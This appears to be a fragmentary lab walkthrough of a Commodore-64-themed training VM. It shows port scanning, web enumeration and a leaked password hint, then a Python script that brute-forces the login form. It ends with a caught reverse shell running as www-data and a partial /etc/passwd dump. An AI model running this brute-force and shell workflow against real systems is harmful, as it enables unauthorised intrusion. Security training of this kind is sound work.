ByteReaper

echo "SGVsbG8gV29ybGQuLi4gTGV0IHRoZSBSZWFwaW5nIEJlZ2lu" | base64 -d 
#Hello World... Let the Reaping Begin

ByteReaper

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.234.1   00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                                                                      
 192.168.234.167 00:0c:29:5d:88:b2      1      60  VMware, Inc.                                                                                                                                      
 192.168.234.254 00:50:56:e1:ab:9c      1      60  VMware, Inc.                

ByteReaper

root@kali:~# nmap -sS -Pn -p1-65535 192.168.234.167

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 14:14 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.234.167
Host is up (0.000068s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:5D:88:B2 (VMware)

ByteReaper

root@kali:~# nikto -host 192.168.234.167
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.234.167
+ Target Hostname:    192.168.234.167
+ Target Port:        80
+ Start Time:         2016-06-06 14:22:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x116 0x5339ba83ee199 

ByteReaper

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jun  6 14:27:52 2016
URL_BASE: http://192.168.234.167/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

---- Scanning URL: http://192.168.234.167/ ----

ByteReaper

<TITLE>38911 Bytes Free</TITLE>
<BODY>
So.... Back for more are you....? Give Ben Daglish a call. I'm sure
he's know the login B-)
<br></br>
<B>Commodore 64 Still ready</B>
<br></br>
<img src="commodore64/c64_1280x1024.jpg" alt="commodore64" height="1024" width="1280">
</BODY>

ByteReaper

<title>Shoo!</title>
<!-- added by robhubbard password is the C=64 sound chip lowercase -->
<!-- 3letters4digits no space... Instead, show user a proper micro -->
<BODY>
Will you go away, I'm trying to press play on tape and you bother me kid!
<br></br>
<img src="200.gif" alt="commodore64" height="408" width="544">
</BODY>

ByteReaper

import requests

lastLen = '0'
url = 'http://192.168.234.167/commodore64/index.php'
user = 'robhubbard'
for i in xrange(0,9999):
        passwd = 'mos{}'.format(i)
        resp = requests.post(url,files={'input_username': (None, user),'input_password':(None, passwd),'path': (None,'')})
        if lastLen != len(resp.text):
                print len(resp.text)

ByteReaper

1841
Using mos3935 resulted in a different page size
18438
Using mos6518 resulted in a different page size
1841
Using mos6519 resulted in a different page size
1840

ByteReaper

connect to [192.168.234.2] from (UNKNOWN) [192.168.234.167] 43464
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin